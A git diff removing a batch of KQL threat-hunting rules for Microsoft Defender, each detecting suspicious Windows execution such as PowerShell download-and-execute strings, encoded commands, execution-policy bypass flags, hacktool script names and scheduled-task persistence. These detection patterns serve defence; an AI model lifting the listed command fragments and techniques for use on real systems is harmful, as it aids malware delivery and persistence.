-// Description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script that's located in a potentially suspicious location to run for a specific VM state
-// Tags: attack.execution, attack.persistence, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine contains " script " and ProcessCommandLine contains " set ") and (FolderPath endswith "\\VMwareToolBoxCmd.exe" or ProcessVersionInfoOriginalFileName =~ "toolbox-cmd.exe") and (ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp")
\ No newline at end of file
diff --git a/Execution/Suspicious_PowerShell_Download_and_Execute_Pattern.kql b/Execution/Suspicious_PowerShell_Download_and_Execute_Pattern.kql
deleted file mode 100644
index 047e80a5..00000000
--- a/Execution/Suspicious_PowerShell_Download_and_Execute_Pattern.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/28
-// Level: high
-// Description: Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "IEX ((New-Object Net.WebClient).DownloadString" or ProcessCommandLine contains "IEX (New-Object Net.WebClient).DownloadString" or ProcessCommandLine contains "IEX((New-Object Net.WebClient).DownloadString" or ProcessCommandLine contains "IEX(New-Object Net.WebClient).DownloadString" or ProcessCommandLine contains " -command (New-Object System.Net.WebClient).DownloadFile(" or ProcessCommandLine contains " -c (New-Object System.Net.WebClient).DownloadFile("
\ No newline at end of file
diff --git a/Execution/Suspicious_PowerShell_Encoded_Command_Patterns.kql b/Execution/Suspicious_PowerShell_Encoded_Command_Patterns.kql
deleted file mode 100644
index 787c878f..00000000
--- a/Execution/Suspicious_PowerShell_Encoded_Command_Patterns.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/05/24
-// Level: high
-// Description: Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " JAB" or ProcessCommandLine contains " SUVYI" or ProcessCommandLine contains " SQBFAFgA" or ProcessCommandLine contains " aWV4I" or ProcessCommandLine contains " IAB" or ProcessCommandLine contains " PAA" or ProcessCommandLine contains " aQBlAHgA") and (ProcessCommandLine contains " -e " or ProcessCommandLine contains " -en " or ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -enco") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.Exe", "pwsh.dll")))) and (not((InitiatingProcessFolderPath contains "C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or InitiatingProcessFolderPath contains "\\gc_worker.exe")))
\ No newline at end of file
diff --git a/Execution/Suspicious_PowerShell_IEX_Execution_Patterns.kql b/Execution/Suspicious_PowerShell_IEX_Execution_Patterns.kql
deleted file mode 100644
index 54d656c3..00000000
--- a/Execution/Suspicious_PowerShell_IEX_Execution_Patterns.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/03/24
-// Level: high
-// Description: Detects suspicious ways to run Invoke-Execution using IEX alias
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (((ProcessCommandLine contains " | iex;" or ProcessCommandLine contains " | iex " or ProcessCommandLine contains " | iex}" or ProcessCommandLine contains " | IEX ;" or ProcessCommandLine contains " | IEX -Error" or ProcessCommandLine contains " | IEX (new" or ProcessCommandLine contains ");IEX ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) and (ProcessCommandLine contains "::FromBase64String" or ProcessCommandLine contains ".GetString([System.Convert]::")) or (ProcessCommandLine contains ")|iex;$" or ProcessCommandLine contains ");iex($" or ProcessCommandLine contains ");iex $" or ProcessCommandLine contains " | IEX | " or ProcessCommandLine contains " | iex\\\"")
\ No newline at end of file
diff --git a/Execution/Suspicious_PowerShell_Parameter_Substring.kql b/Execution/Suspicious_PowerShell_Parameter_Substring.kql
deleted file mode 100644
index 9a895de4..00000000
--- a/Execution/Suspicious_PowerShell_Parameter_Substring.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)
-// Date: 2019/01/16
-// Level: high
-// Description: Detects suspicious PowerShell invocation with a parameter substring
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -windowstyle h " or ProcessCommandLine contains " -windowstyl h" or ProcessCommandLine contains " -windowsty h" or ProcessCommandLine contains " -windowst h" or ProcessCommandLine contains " -windows h" or ProcessCommandLine contains " -windo h" or ProcessCommandLine contains " -wind h" or ProcessCommandLine contains " -win h" or ProcessCommandLine contains " -wi h" or ProcessCommandLine contains " -win h " or ProcessCommandLine contains " -win hi " or ProcessCommandLine contains " -win hid " or ProcessCommandLine contains " -win hidd " or ProcessCommandLine contains " -win hidde " or ProcessCommandLine contains " -NoPr " or ProcessCommandLine contains " -NoPro " or ProcessCommandLine contains " -NoProf " or ProcessCommandLine contains " -NoProfi " or ProcessCommandLine contains " -NoProfil " or ProcessCommandLine contains " -nonin " or ProcessCommandLine contains " -nonint " or ProcessCommandLine contains " -noninte " or ProcessCommandLine contains " -noninter " or ProcessCommandLine contains " -nonintera " or ProcessCommandLine contains " -noninterac " or ProcessCommandLine contains " -noninteract " or ProcessCommandLine contains " -noninteracti " or ProcessCommandLine contains " -noninteractiv " or ProcessCommandLine contains " -ec " or ProcessCommandLine contains " -encodedComman " or ProcessCommandLine contains " -encodedComma " or ProcessCommandLine contains " -encodedComm " or ProcessCommandLine contains " -encodedCom " or ProcessCommandLine contains " -encodedCo " or ProcessCommandLine contains " -encodedC " or ProcessCommandLine contains " -encoded " or ProcessCommandLine contains " -encode " or ProcessCommandLine contains " -encod " or ProcessCommandLine contains " -enco " or ProcessCommandLine contains " -en " or ProcessCommandLine contains " -executionpolic " or ProcessCommandLine contains " -executionpoli " or ProcessCommandLine contains " -executionpol " or ProcessCommandLine contains " -executionpo " or ProcessCommandLine contains " -executionp " or ProcessCommandLine contains " -execution bypass" or ProcessCommandLine contains " -executio bypass" or ProcessCommandLine contains " -executi bypass" or ProcessCommandLine contains " -execut bypass" or ProcessCommandLine contains " -execu bypass" or ProcessCommandLine contains " -exec bypass" or ProcessCommandLine contains " -exe bypass" or ProcessCommandLine contains " -ex bypass" or ProcessCommandLine contains " -ep bypass" or ProcessCommandLine contains " /windowstyle h " or ProcessCommandLine contains " /windowstyl h" or ProcessCommandLine contains " /windowsty h" or ProcessCommandLine contains " /windowst h" or ProcessCommandLine contains " /windows h" or ProcessCommandLine contains " /windo h" or ProcessCommandLine contains " /wind h" or ProcessCommandLine contains " /win h" or ProcessCommandLine contains " /wi h" or ProcessCommandLine contains " /win h " or ProcessCommandLine contains " /win hi " or ProcessCommandLine contains " /win hid " or ProcessCommandLine contains " /win hidd " or ProcessCommandLine contains " /win hidde " or ProcessCommandLine contains " /NoPr " or ProcessCommandLine contains " /NoPro " or ProcessCommandLine contains " /NoProf " or ProcessCommandLine contains " /NoProfi " or ProcessCommandLine contains " /NoProfil " or ProcessCommandLine contains " /nonin " or ProcessCommandLine contains " /nonint " or ProcessCommandLine contains " /noninte " or ProcessCommandLine contains " /noninter " or ProcessCommandLine contains " /nonintera " or ProcessCommandLine contains " /noninterac " or ProcessCommandLine contains " /noninteract " or ProcessCommandLine contains " /noninteracti " or ProcessCommandLine contains " /noninteractiv " or ProcessCommandLine contains " /ec " or ProcessCommandLine contains " /encodedComman " or ProcessCommandLine contains " /encodedComma " or ProcessCommandLine contains " /encodedComm " or ProcessCommandLine contains " /encodedCom " or ProcessCommandLine contains " /encodedCo " or ProcessCommandLine contains " /encodedC " or ProcessCommandLine contains " /encoded " or ProcessCommandLine contains " /encode " or ProcessCommandLine contains " /encod " or ProcessCommandLine contains " /enco " or ProcessCommandLine contains " /en " or ProcessCommandLine contains " /executionpolic " or ProcessCommandLine contains " /executionpoli " or ProcessCommandLine contains " /executionpol " or ProcessCommandLine contains " /executionpo " or ProcessCommandLine contains " /executionp " or ProcessCommandLine contains " /execution bypass" or ProcessCommandLine contains " /executio bypass" or ProcessCommandLine contains " /executi bypass" or ProcessCommandLine contains " /execut bypass" or ProcessCommandLine contains " /execu bypass" or ProcessCommandLine contains " /exec bypass" or ProcessCommandLine contains " /exe bypass" or ProcessCommandLine contains " /ex bypass" or ProcessCommandLine contains " /ep bypass") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")
\ No newline at end of file
diff --git a/Execution/Suspicious_PowerShell_Parent_Process.kql b/Execution/Suspicious_PowerShell_Parent_Process.kql
deleted file mode 100644
index 04761c14..00000000
--- a/Execution/Suspicious_PowerShell_Parent_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov, Harish Segar
-// Date: 2020/03/20
-// Level: high
-// Description: Detects a suspicious or uncommon parent processes of PowerShell
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (InitiatingProcessFolderPath contains "tomcat" or (InitiatingProcessFolderPath endswith "\\amigo.exe" or InitiatingProcessFolderPath endswith "\\browser.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\iexplore.exe" or InitiatingProcessFolderPath endswith "\\jbosssvc.exe" or InitiatingProcessFolderPath endswith "\\microsoftedge.exe" or InitiatingProcessFolderPath endswith "\\microsoftedgecp.exe" or InitiatingProcessFolderPath endswith "\\MicrosoftEdgeSH.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\sqlagent.exe" or InitiatingProcessFolderPath endswith "\\sqlserver.exe" or InitiatingProcessFolderPath endswith "\\sqlservr.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe")) and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessCommandLine contains "/c powershell" or ProcessCommandLine contains "/c pwsh") or ProcessVersionInfoFileDescription =~ "Windows PowerShell" or ProcessVersionInfoProductName =~ "PowerShell Core 6" or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/Execution/Suspicious_Process_Created_Via_Wmic.EXE.kql b/Execution/Suspicious_Process_Created_Via_Wmic.EXE.kql
deleted file mode 100644
index c2d28b62..00000000
--- a/Execution/Suspicious_Process_Created_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/10/12
-// Level: high
-// Description: Detects WMIC executing "process call create" with suspicious calls to processes such as "rundll32", "regsrv32", etc.
-// Tags: attack.execution, attack.t1047
-DeviceProcessEvents
-| where (ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd.exe /r " or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "%ProgramData%" or ProcessCommandLine contains "%appdata%" or ProcessCommandLine contains "%comspec%" or ProcessCommandLine contains "%localappdata%") and (ProcessCommandLine contains "process " and ProcessCommandLine contains "call " and ProcessCommandLine contains "create ")
\ No newline at end of file
diff --git a/Execution/Suspicious_Program_Names.kql b/Execution/Suspicious_Program_Names.kql
deleted file mode 100644
index 793a6794..00000000
--- a/Execution/Suspicious_Program_Names.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/11
-// Level: high
-// Description: Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine contains "inject.ps1" or ProcessCommandLine contains "Invoke-CVE" or ProcessCommandLine contains "pupy.ps1" or ProcessCommandLine contains "payload.ps1" or ProcessCommandLine contains "beacon.ps1" or ProcessCommandLine contains "PowerView.ps1" or ProcessCommandLine contains "bypass.ps1" or ProcessCommandLine contains "obfuscated.ps1" or ProcessCommandLine contains "obfusc.ps1" or ProcessCommandLine contains "obfus.ps1" or ProcessCommandLine contains "obfs.ps1" or ProcessCommandLine contains "evil.ps1" or ProcessCommandLine contains "MiniDogz.ps1" or ProcessCommandLine contains "_enc.ps1" or ProcessCommandLine contains "\\shell.ps1" or ProcessCommandLine contains "\\rshell.ps1" or ProcessCommandLine contains "revshell.ps1" or ProcessCommandLine contains "\\av.ps1" or ProcessCommandLine contains "\\av_test.ps1" or ProcessCommandLine contains "adrecon.ps1" or ProcessCommandLine contains "mimikatz.ps1" or ProcessCommandLine contains "\\PowerUp_" or ProcessCommandLine contains "powerup.ps1" or ProcessCommandLine contains "\\Temp\\a.ps1" or ProcessCommandLine contains "\\Temp\\p.ps1" or ProcessCommandLine contains "\\Temp\\1.ps1" or ProcessCommandLine contains "Hound.ps1" or ProcessCommandLine contains "encode.ps1" or ProcessCommandLine contains "powercat.ps1") or ((FolderPath contains "\\CVE-202" or FolderPath contains "\\CVE202") or (FolderPath endswith "\\poc.exe" or FolderPath endswith "\\artifact.exe" or FolderPath endswith "\\artifact64.exe" or FolderPath endswith "\\artifact_protected.exe" or FolderPath endswith "\\artifact32.exe" or FolderPath endswith "\\artifact32big.exe" or FolderPath endswith "obfuscated.exe" or FolderPath endswith "obfusc.exe" or FolderPath endswith "\\meterpreter"))
\ No newline at end of file
diff --git a/Execution/Suspicious_RASdial_Activity.kql b/Execution/Suspicious_RASdial_Activity.kql
deleted file mode 100644
index 4e30f528..00000000
--- a/Execution/Suspicious_RASdial_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: juju4
-// Date: 2019/01/16
-// Level: medium
-// Description: Detects suspicious process related to rasdial.exe
-// Tags: attack.defense_evasion, attack.execution, attack.t1059
-DeviceProcessEvents
-| where FolderPath endswith "rasdial.exe"
\ No newline at end of file
diff --git a/Execution/Suspicious_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql b/Execution/Suspicious_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql
deleted file mode 100644
index 62278102..00000000
--- a/Execution/Suspicious_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/08
-// Level: high
-// Description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine
-// Tags: attack.discovery, attack.execution, attack.t1615, attack.t1059.005
-DeviceProcessEvents
-| where ProcessCommandLine contains "gatherNetworkInfo.vbs" and (not((FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe")))
\ No newline at end of file
diff --git a/Execution/Suspicious_Remote_Child_Process_From_Outlook.kql b/Execution/Suspicious_Remote_Child_Process_From_Outlook.kql
deleted file mode 100644
index 38edae09..00000000
--- a/Execution/Suspicious_Remote_Child_Process_From_Outlook.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2018/12/27
-// Level: high
-// Description: Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).
-// Tags: attack.execution, attack.t1059, attack.t1202
-DeviceProcessEvents
-| where FolderPath startswith "\\\\" and InitiatingProcessFolderPath endswith "\\outlook.exe"
\ No newline at end of file
diff --git a/Execution/Suspicious_Runscripthelper.exe.kql b/Execution/Suspicious_Runscripthelper.exe.kql
deleted file mode 100644
index 568eff5f..00000000
--- a/Execution/Suspicious_Runscripthelper.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, oscd.community
-// Date: 2020/10/09
-// Level: medium
-// Description: Detects execution of powershell scripts via Runscripthelper.exe
-// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where ProcessCommandLine contains "surfacecheck" and FolderPath endswith "\\Runscripthelper.exe"
\ No newline at end of file
diff --git a/Execution/Suspicious_Scan_Loop_Network.kql b/Execution/Suspicious_Scan_Loop_Network.kql
deleted file mode 100644
index 19d4fbec..00000000
--- a/Execution/Suspicious_Scan_Loop_Network.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/03/12
-// Level: medium
-// Description: Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system
-// Tags: attack.execution, attack.t1059, attack.discovery, attack.t1018
-DeviceProcessEvents
-| where (ProcessCommandLine contains "for " or ProcessCommandLine contains "foreach ") and (ProcessCommandLine contains "nslookup" or ProcessCommandLine contains "ping")
\ No newline at end of file
diff --git a/Execution/Suspicious_Scheduled_Task_Creation_Involving_Temp_Folder.kql b/Execution/Suspicious_Scheduled_Task_Creation_Involving_Temp_Folder.kql
deleted file mode 100644
index 00359f36..00000000
--- a/Execution/Suspicious_Scheduled_Task_Creation_Involving_Temp_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/03/11
-// Level: high
-// Description: Detects the creation of scheduled tasks that involves a temporary folder and runs only once
-// Tags: attack.execution, attack.persistence, attack.t1053.005
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /create " and ProcessCommandLine contains " /sc once " and ProcessCommandLine contains "\\Temp\\") and FolderPath endswith "\\schtasks.exe"
\ No newline at end of file
diff --git a/Execution/Suspicious_Scheduled_Task_Name_As_GUID.kql b/Execution/Suspicious_Scheduled_Task_Name_As_GUID.kql
deleted file mode 100644
index 6bdb9b98..00000000
--- a/Execution/Suspicious_Scheduled_Task_Name_As_GUID.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/31
-// Level: medium
-// Description: Detects creation of a scheduled task with a GUID like name
-// Tags: attack.execution, attack.t1053.005
-DeviceProcessEvents
-| where (ProcessCommandLine contains "}\"" or ProcessCommandLine contains "}'" or ProcessCommandLine contains "} ") and (ProcessCommandLine contains "/Create " and FolderPath endswith "\\schtasks.exe") and (ProcessCommandLine contains "/TN \"{" or ProcessCommandLine contains "/TN '{" or ProcessCommandLine contains "/TN {")
\ No newline at end of file
diff --git a/Execution/Suspicious_Scheduled_Task_Write_to_System32_Tasks.kql b/Execution/Suspicious_Scheduled_Task_Write_to_System32_Tasks.kql
deleted file mode 100644
index 6ba5044f..00000000
--- a/Execution/Suspicious_Scheduled_Task_Write_to_System32_Tasks.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/11/16
-// Level: high
-// Description: Detects the creation of tasks from processes executed from suspicious locations
-// Tags: attack.persistence, attack.execution, attack.t1053
-DeviceFileEvents
-| where (InitiatingProcessFolderPath contains "\\AppData\\" or InitiatingProcessFolderPath contains "C:\\PerfLogs" or InitiatingProcessFolderPath contains "\\Windows\\System32\\config\\systemprofile") and FolderPath contains "\\Windows\\System32\\Tasks"
\ No newline at end of file
diff --git a/Execution/Suspicious_Schtasks_Execution_AppData_Folder.kql b/Execution/Suspicious_Schtasks_Execution_AppData_Folder.kql
deleted file mode 100644
index fe01afd0..00000000
--- a/Execution/Suspicious_Schtasks_Execution_AppData_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/03/15
-// Level: high
-// Description: Detects the creation of a schtask that executes a file from C:\Users\<USER>\AppData\Local
-// Tags: attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM ") and (ProcessCommandLine contains "/Create" and ProcessCommandLine contains "/RU" and ProcessCommandLine contains "/TR" and ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\") and FolderPath endswith "\\schtasks.exe") and (not((ProcessCommandLine contains "/TN TVInstallRestore" and FolderPath endswith "\\schtasks.exe" and (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and InitiatingProcessFolderPath contains "TeamViewer_.exe"))))
\ No newline at end of file
diff --git a/Execution/Suspicious_Schtasks_From_Env_Var_Folder.kql b/Execution/Suspicious_Schtasks_From_Env_Var_Folder.kql
deleted file mode 100644
index cd2233e3..00000000
--- a/Execution/Suspicious_Schtasks_From_Env_Var_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/21
-// Level: medium
-// Description: Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware
-// Tags: attack.execution, attack.t1053.005
-DeviceProcessEvents
-| where (((ProcessCommandLine contains ":\\Perflogs" or ProcessCommandLine contains ":\\Windows\\Temp" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\Users\\Public" or ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%Public%") and (ProcessCommandLine contains " /create " and FolderPath endswith "\\schtasks.exe")) or (InitiatingProcessCommandLine endswith "\\svchost.exe -k netsvcs -p -s Schedule" and (ProcessCommandLine contains ":\\Perflogs" or ProcessCommandLine contains ":\\Windows\\Temp" or ProcessCommandLine contains "\\Users\\Public" or ProcessCommandLine contains "%Public%"))) and (not(((ProcessCommandLine contains "/Create /Xml \"C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Temp\\.CR." and ProcessCommandLine contains "Avira_Security_Installation.xml") or ((ProcessCommandLine contains ".tmp\\UpdateFallbackTask.xml" or ProcessCommandLine contains ".tmp\\WatchdogServiceControlManagerTimeout.xml" or ProcessCommandLine contains ".tmp\\SystrayAutostart.xml" or ProcessCommandLine contains ".tmp\\MaintenanceTask.xml") and (ProcessCommandLine contains "/Create /F /TN" and ProcessCommandLine contains "/Xml " and ProcessCommandLine contains "\\AppData\\Local\\Temp\\is-" and ProcessCommandLine contains "Avira_")) or (ProcessCommandLine contains "\\AppData\\Local\\Temp\\" and ProcessCommandLine contains "/Create /TN \"klcp_update\" /XML " and ProcessCommandLine contains "\\klcp_update_task.xml") or ((ProcessCommandLine contains "update_task.xml" or ProcessCommandLine contains "/Create /TN TVInstallRestore /TR") or InitiatingProcessCommandLine contains "unattended.ini"))))
\ No newline at end of file
diff --git a/Execution/Suspicious_Schtasks_Schedule_Type_With_High_Privileges.kql b/Execution/Suspicious_Schtasks_Schedule_Type_With_High_Privileges.kql
deleted file mode 100644
index 5bf43f5b..00000000
--- a/Execution/Suspicious_Schtasks_Schedule_Type_With_High_Privileges.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/31
-// Level: medium
-// Description: Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type
-// Tags: attack.execution, attack.t1053.005
-DeviceProcessEvents
-| where (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") and (ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM" or ProcessCommandLine contains "HIGHEST") and (ProcessCommandLine contains " ONLOGON " or ProcessCommandLine contains " ONSTART " or ProcessCommandLine contains " ONCE " or ProcessCommandLine contains " ONIDLE ")
\ No newline at end of file
diff --git a/Execution/Suspicious_Schtasks_Schedule_Types.kql b/Execution/Suspicious_Schtasks_Schedule_Types.kql
deleted file mode 100644
index 93316841..00000000
--- a/Execution/Suspicious_Schtasks_Schedule_Types.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/09
-// Level: high
-// Description: Detects scheduled task creations or modification on a suspicious schedule type
-// Tags: attack.execution, attack.t1053.005
-DeviceProcessEvents
-| where ((FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") and (ProcessCommandLine contains " ONLOGON " or ProcessCommandLine contains " ONSTART " or ProcessCommandLine contains " ONCE " or ProcessCommandLine contains " ONIDLE ")) and (not((ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM" or ProcessCommandLine contains "HIGHEST")))
\ No newline at end of file
diff --git a/Execution/Suspicious_Script_Execution_From_Temp_Folder.kql b/Execution/Suspicious_Script_Execution_From_Temp_Folder.kql
deleted file mode 100644
index 3b3ce9ee..00000000
--- a/Execution/Suspicious_Script_Execution_From_Temp_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton
-// Date: 2021/07/14
-// Level: high
-// Description: Detects a suspicious script executions from temporary folder
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "\\Windows\\Temp" or ProcessCommandLine contains "\\Temporary Internet" or ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\AppData\\Roaming\\Temp" or ProcessCommandLine contains "%TEMP%" or ProcessCommandLine contains "%TMP%" or ProcessCommandLine contains "%LocalAppData%\\Temp") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe")) and (not((ProcessCommandLine contains " >" or ProcessCommandLine contains "Out-File" or ProcessCommandLine contains "ConvertTo-Json" or ProcessCommandLine contains "-WindowStyle hidden -Verb runAs" or ProcessCommandLine contains "\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Temp\\Amazon\\EC2-Windows\\")))
\ No newline at end of file
diff --git a/Execution/Suspicious_Spool_Service_Child_Process.kql b/Execution/Suspicious_Spool_Service_Child_Process.kql
deleted file mode 100644
index 9e6385cb..00000000
--- a/Execution/Suspicious_Spool_Service_Child_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Justin C. (@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)
-// Date: 2021/07/11
-// Level: high
-// Description: Detects suspicious print spool service (spoolsv.exe) child processes.
-// Tags: attack.execution, attack.t1203, attack.privilege_escalation, attack.t1068
-DeviceProcessEvents
-| where (ProcessIntegrityLevel =~ "System" and InitiatingProcessFolderPath endswith "\\spoolsv.exe") and ((FolderPath endswith "\\gpupdate.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\taskkill.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\taskmgr.exe" or FolderPath endswith "\\sc.exe" or FolderPath endswith "\\findstr.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\wget.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\accesschk.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\fsutil.exe" or FolderPath endswith "\\cipher.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\write.exe" or FolderPath endswith "\\wuauclt.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\query.exe") or ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") and (not(ProcessCommandLine contains "start"))) or (FolderPath endswith "\\cmd.exe" and (not((ProcessCommandLine contains ".spl" or ProcessCommandLine contains "route add" or ProcessCommandLine contains "program files")))) or (FolderPath endswith "\\netsh.exe" and (not((ProcessCommandLine contains "add portopening" or ProcessCommandLine contains "rule name")))) or ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and (not(ProcessCommandLine contains ".spl"))) or (ProcessCommandLine endswith "rundll32.exe" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")))
\ No newline at end of file
diff --git a/Execution/Suspicious_Use_of_CSharp_Interactive_Console.kql b/Execution/Suspicious_Use_of_CSharp_Interactive_Console.kql
deleted file mode 100644
index 027c40e7..00000000
